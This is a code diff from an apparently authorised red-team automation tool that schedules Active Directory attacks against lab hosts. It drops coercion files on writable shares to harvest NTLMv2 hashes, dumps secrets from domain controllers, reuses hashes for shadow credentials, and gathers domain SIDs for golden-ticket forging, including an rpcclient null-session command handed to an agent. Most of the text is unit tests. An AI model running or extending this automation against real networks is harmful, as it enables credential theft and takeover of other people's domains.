+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].share_host, "192.168.58.22");
+ assert_eq!(work[0].share_name, "Public");
+ assert_eq!(work[0].dedup_key, "searchconn:192.168.58.22:Public");
+ assert_eq!(work[0].listener, "192.168.58.50");
+ }
+
+ #[test]
+ fn collect_readonly_share_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "READ"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ state.mark_processed(
+ DEDUP_SEARCHCONNECTOR,
+ "searchconn:192.168.58.22:Public".into(),
+ );
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_prefers_domain_matched_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Data", "READ/WRITE"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential_no_host() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ // No host entry for this share IP, so domain is empty -> falls back to first cred
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_shares_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Data", "READ/WRITE"));
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 2);
+ let names: Vec<&str> = work.iter().map(|w| w.share_name.as_str()).collect();
+ assert!(names.contains(&"Public"));
+ assert!(names.contains(&"Data"));
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ }
+ let state = shared.read().await;
+ let work = collect_searchconnector_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].share_host, "192.168.58.22");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/secretsdump.rs b/ares-cli/src/orchestrator/automation/secretsdump.rs
index 005da2b5..27d84f9c 100644
--- a/ares-cli/src/orchestrator/automation/secretsdump.rs
+++ b/ares-cli/src/orchestrator/automation/secretsdump.rs
@@ -84,7 +84,7 @@ pub async fn auto_local_admin_secretsdump(
let mut items = Vec::new();
for cred in &creds {
- for (dc_domain, dc_ip) in state.domain_controllers.iter() {
+ for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() {
if is_valid_secretsdump_target(dc_domain, &cred.domain) {
let dedup = secretsdump_dedup_key(dc_ip, &cred.domain, &cred.username);
if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) {
@@ -135,7 +135,7 @@ pub async fn auto_local_admin_secretsdump(
for dominated in &state.dominated_domains {
let dom = dominated.to_lowercase();
// Find parent domain DCs: domains where the child ends with ".{parent}"
- for (dc_domain, dc_ip) in state.domain_controllers.iter() {
+ for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() {
if is_child_of(&dom, dc_domain) {
// Find Administrator NTLM hash from the dominated child domain
if let Some(hash) = state.hashes.iter().find(|h| {
diff --git a/ares-cli/src/orchestrator/automation/shadow_credentials.rs b/ares-cli/src/orchestrator/automation/shadow_credentials.rs
index 4d8759ec..f1ba4861 100644
--- a/ares-cli/src/orchestrator/automation/shadow_credentials.rs
+++ b/ares-cli/src/orchestrator/automation/shadow_credentials.rs
@@ -82,29 +82,14 @@ pub async fn auto_shadow_credentials(
.unwrap_or("")
.to_string();
- // Find credential for the source user
- let credential = state
- .credentials
- .iter()
- .find(|c| {
- c.username.to_lowercase() == source_user.to_lowercase()
- && (domain.is_empty()
- || c.domain.to_lowercase() == domain.to_lowercase())
- })
- .cloned();
-
- // Also check for NTLM hash as fallback
+ // Find credential for the source user. The source user's
+ // own domain may differ from the vuln's target `domain`
+ // (cross-forest ACL edges like charlie@contoso →
+ // ivy@fabrikam), so we cannot domain-restrict the
+ // lookup against the target.
+ let credential = state.find_source_credential(&source_user, &domain);
let hash = if credential.is_none() {
- state
- .hashes
- .iter()
- .find(|h| {
- h.username.to_lowercase() == source_user.to_lowercase()
- && h.hash_type.to_uppercase() == "NTLM"
- && (domain.is_empty()
- || h.domain.to_lowercase() == domain.to_lowercase())
- })
- .cloned()
+ state.find_source_hash(&source_user, &domain)
} else {
None
};
diff --git a/ares-cli/src/orchestrator/automation/share_coercion.rs b/ares-cli/src/orchestrator/automation/share_coercion.rs
new file mode 100644
index 00000000..be68f281
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/share_coercion.rs
@@ -0,0 +1,515 @@
+//! auto_share_coercion -- drop coercion files (.scf, .url, .lnk) on writable
+//! shares to capture NTLMv2 hashes via Responder/ntlmrelayx.
+//!
+//! When a user browses to a share containing one of these files, Windows
+//! automatically connects back to the attacker-controlled listener, leaking the
+//! user's NTLMv2 hash. This is a passive credential harvesting technique.
+//!
+//! Requires: writable shares discovered by share_enum, a listener IP for the
+//! UNC path in the coercion file, and Responder running on the listener.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect share coercion work items from current state.
+///
+/// Pure logic extracted from `auto_share_coercion` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime. Returns at most 3 items
+/// per call to avoid flooding the dispatcher.
+fn collect_share_coercion_work(state: &StateInner, listener: &str) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let cred = match state.credentials.first() {
+ Some(c) => c.clone(),
+ None => return Vec::new(),
+ };
+
+ state
+ .shares
+ .iter()
+ .filter(|s| {
+ let perms = s.permissions.to_uppercase();
+ perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE")
+ })
+ .filter(|s| {
+ // Skip default admin/system shares
+ let name_upper = s.name.to_uppercase();
+ !matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ )
+ })
+ .filter(|s| {
+ let dedup_key = format!("{}:{}", s.host, s.name);
+ !state.is_processed(DEDUP_WRITABLE_SHARES, &dedup_key)
+ })
+ .map(|s| ShareCoercionWork {
+ host: s.host.clone(),
+ share_name: s.name.clone(),
+ listener: listener.to_string(),
+ credential: cred.clone(),
+ })
+ .take(3) // limit per cycle to avoid flooding
+ .collect()
+}
+
+/// Monitors for writable shares and dispatches coercion file drops.
+/// Interval: 45s.
+pub async fn auto_share_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("share_coercion") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue, // need listener for UNC path in coercion files
+ };
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_share_coercion_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "share_coercion",
+ "target_ip": item.host,
+ "share_name": item.share_name,
+ "listener_ip": item.listener,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("share_coercion");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.host,
+ share = %item.share_name,
+ "Share coercion file drop dispatched"
+ );
+
+ let dedup_key = format!("{}:{}", item.host, item.share_name);
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_WRITABLE_SHARES, dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_WRITABLE_SHARES, &dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(
+ host = %item.host,
+ share = %item.share_name,
+ "Share coercion task deferred by throttler"
+ );
+ }
+ Err(e) => {
+ warn!(
+ err = %e,
+ host = %item.host,
+ share = %item.share_name,
+ "Failed to dispatch share coercion"
+ );
+ }
+ }
+ }
+ }
+}
+
+struct ShareCoercionWork {
+ host: String,
+ share_name: String,
+ listener: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+ use ares_core::models::{Credential, Share};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_share(host: &str, name: &str, permissions: &str) -> Share {
+ Share {
+ host: host.into(),
+ name: name.into(),
+ permissions: permissions.into(),
+ comment: String::new(),
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("{}:{}", "192.168.58.22", "Users");
+ assert_eq!(key, "192.168.58.22:Users");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_WRITABLE_SHARES, "writable_shares");
+ }
+
+ #[test]
+ fn admin_shares_filtered() {
+ let admin_shares = ["C$", "ADMIN$", "IPC$", "PRINT$", "SYSVOL", "NETLOGON"];
+ for name in &admin_shares {
+ let name_upper = name.to_uppercase();
+ assert!(
+ matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ ),
+ "{name} should be filtered"
+ );
+ }
+ }
+
+ #[test]
+ fn non_admin_shares_pass() {
+ let user_shares = ["Users", "Public", "Data", "shared"];
+ for name in &user_shares {
+ let name_upper = name.to_uppercase();
+ assert!(
+ !matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ ),
+ "{name} should pass through"
+ );
+ }
+ }
+
+ #[test]
+ fn writable_permission_matching() {
+ let writable = ["WRITE", "READ/WRITE", "rw WRITE access"];
+ for p in &writable {
+ let perms = p.to_uppercase();
+ let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE");
+ assert!(is_writable, "{p} should be writable");
+ }
+ }
+
+ #[test]
+ fn readonly_permission_rejected() {
+ let readonly = ["READ", "NONE", "DENIED"];
+ for p in &readonly {
+ let perms = p.to_uppercase();
+ let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE");
+ assert!(!is_writable, "{p} should NOT be writable");
+ }
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "share_coercion",
+ "target_ip": "192.168.58.22",
+ "share_name": "Users",
+ "listener_ip": "192.168.58.50",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "share_coercion");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["share_name"], "Users");
+ assert_eq!(payload["listener_ip"], "192.168.58.50");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn admin_share_filtering_lowercase_variations() {
+ let lower_admin_shares = ["c$", "admin$", "ipc$", "print$", "sysvol", "netlogon"];
+ for name in &lower_admin_shares {
+ let name_upper = name.to_uppercase();
+ assert!(
+ matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ ),
+ "{name} (lowercase) should be filtered after uppercasing"
+ );
+ }
+ }
+
+ #[test]
+ fn writable_permission_with_change_keyword() {
+ let perm = "CHANGE";
+ let perms = perm.to_uppercase();
+ let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE");
+ assert!(!is_writable, "CHANGE alone should not match WRITE logic");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = ShareCoercionWork {
+ host: "192.168.58.22".into(),
+ share_name: "Data".into(),
+ listener: "192.168.58.50".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.host, "192.168.58.22");
+ assert_eq!(work.share_name, "Data");
+ assert_eq!(work.listener, "192.168.58.50");
+ assert_eq!(work.credential.username, "testuser");
+ assert_eq!(work.credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn per_cycle_limit_of_three() {
+ let shares: Vec = (0..10).map(|i| format!("Share{i}")).collect();
+ let limited: Vec<&String> = shares.iter().take(3).collect();
+ assert_eq!(limited.len(), 3);
+ assert_eq!(*limited[0], "Share0");
+ assert_eq!(*limited[2], "Share2");
+ }
+
+ #[test]
+ fn empty_share_name_handling() {
+ let name = "";
+ let name_upper = name.to_uppercase();
+ assert!(
+ !matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ ),
+ "Empty share name should pass admin filter"
+ );
+ }
+
+ #[test]
+ fn case_insensitive_admin_share_check() {
+ let mixed_case = ["Sysvol", "NetLogon", "Admin$", "Ipc$"];
+ for name in &mixed_case {
+ let name_upper = name.to_uppercase();
+ assert!(
+ matches!(
+ name_upper.as_str(),
+ "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON"
+ ),
+ "{name} should be filtered regardless of case"
+ );
+ }
+ }
+
+ // --- collect_share_coercion_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Users", "WRITE"));
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_shares_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_writable_share_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Users", "WRITE"));
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host, "192.168.58.22");
+ assert_eq!(work[0].share_name, "Users");
+ assert_eq!(work[0].listener, "192.168.58.50");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_readonly_share_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Users", "READ"));
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_admin_shares_filtered() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "ADMIN$", "WRITE"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "C$", "WRITE"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "IPC$", "WRITE"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "SYSVOL", "WRITE"));
+ state
+ .shares
+ .push(make_share("192.168.58.22", "NETLOGON", "WRITE"));
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Users", "WRITE"));
+ state.mark_processed(DEDUP_WRITABLE_SHARES, "192.168.58.22:Users".into());
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_limits_to_three_per_cycle() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ for i in 0..5 {
+ state
+ .shares
+ .push(make_share("192.168.58.22", &format!("Share{i}"), "WRITE"));
+ }
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 3);
+ }
+
+ #[test]
+ fn collect_read_write_permission_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Data", "READ/WRITE"));
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].share_name, "Data");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .shares
+ .push(make_share("192.168.58.22", "Public", "WRITE"));
+ }
+ let state = shared.read().await;
+ let work = collect_share_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host, "192.168.58.22");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/sid_enumeration.rs b/ares-cli/src/orchestrator/automation/sid_enumeration.rs
new file mode 100644
index 00000000..4cd11565
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/sid_enumeration.rs
@@ -0,0 +1,426 @@
+//! auto_sid_enumeration -- enumerate domain SIDs and well-known SID mappings.
+//!
+//! Queries each discovered DC via LDAP to resolve the domain SID, then maps
+//! well-known RIDs (500=Administrator, 502=krbtgt, 512=Domain Admins, etc.)
+//! to confirm account names. This is useful when the RID-500 account has
+//! been renamed (e.g., not "Administrator").
+//!
+//! Also discovers the domain SID needed for golden ticket forging and
+//! ExtraSid attacks.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect SID enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_sid_enumeration` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_sid_enum_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ // Skip if we already have the SID for this domain
+ if state.domain_sids.contains_key(domain) {
+ continue;
+ }
+
+ let dedup_key = format!("sid_enum:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_SID_ENUMERATION, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && c.domain.to_lowercase() == domain.to_lowercase()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ state.credentials.iter().find(|c| {
+ !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ }) {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(SidEnumWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Enumerate domain SIDs and well-known accounts.
+/// Interval: 45s.
+pub async fn auto_sid_enumeration(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("sid_enumeration") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_sid_enum_work(&state)
+ };
+
+ for item in work {
+ // Cross-forest authenticated RPC/LDAP from the source forest's
+ // credential typically returns ACCESS_DENIED — but `rpcclient
+ // -U "" -N -c lsaquery` over a null session usually succeeds
+ // against DCs that allow anonymous LSA queries (most legacy
+ // configurations). The agent loop won't try the null-session
+ // path on its own when handed a credential, so we explicitly
+ // instruct it to fall through. The result-processor's
+ // `extract_lsaquery_domain_sid` regex captures the resulting
+ // `Domain Name: / Domain Sid:` block and caches it against the
+ // domain, which unblocks `forge_inter_realm_and_dump`.
+ let cred_is_cross_forest = !item
+ .credential
+ .domain
+ .to_lowercase()
+ .ends_with(&item.domain.to_lowercase())
+ && !item
+ .domain
+ .to_lowercase()
+ .ends_with(&item.credential.domain.to_lowercase())
+ && item.credential.domain.to_lowercase() != item.domain.to_lowercase();
+ let instructions = if cred_is_cross_forest {
+ Some(format!(
+ "Resolve the domain SID and RID-500 account name for {dom} ({dc}). \
+ The provided credential is from a different forest and authenticated \
+ RPC/LDAP from outside this forest typically fails with ACCESS_DENIED. \
+ Run `rpcclient -U \"\" -N {dc} -c \"lsaquery\"` first (null/anonymous \
+ session — no credential needed) to capture the `Domain Name:` and \
+ `Domain Sid:` lines. Then run `impacket-lookupsid` with the provided \
+ credential as a secondary attempt for RID-500 mapping. Report both \
+ outputs verbatim via task_complete tool_outputs so the parser can \
+ extract the SID.",
+ dom = item.domain,
+ dc = item.dc_ip,
+ ))
+ } else {
+ None
+ };
+
+ let mut payload = json!({
+ "technique": "sid_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+ if let Some(text) = instructions {
+ payload["instructions"] = json!(text);
+ }
+
+ let priority = dispatcher.effective_priority("sid_enumeration");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "SID enumeration dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_SID_ENUMERATION, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_SID_ENUMERATION, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "SID enumeration deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch SID enumeration");
+ }
+ }
+ }
+ }
+}
+
+struct SidEnumWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("sid_enum:{}", "contoso.local");
+ assert_eq!(key, "sid_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_SID_ENUMERATION, "sid_enumeration");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "sid_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "sid_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = SidEnumWork {
+ dedup_key: "sid_enum:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("sid_enum:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "sid_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_domain() {
+ let key1 = format!("sid_enum:{}", "contoso.local");
+ let key2 = format!("sid_enum:{}", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_sid_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_sid_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_with_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_sid_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_domain_with_known_sid() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .domain_sids
+ .insert("contoso.local".into(), "S-1-5-21-1234".into());
+ let work = collect_sid_enum_work(&state);
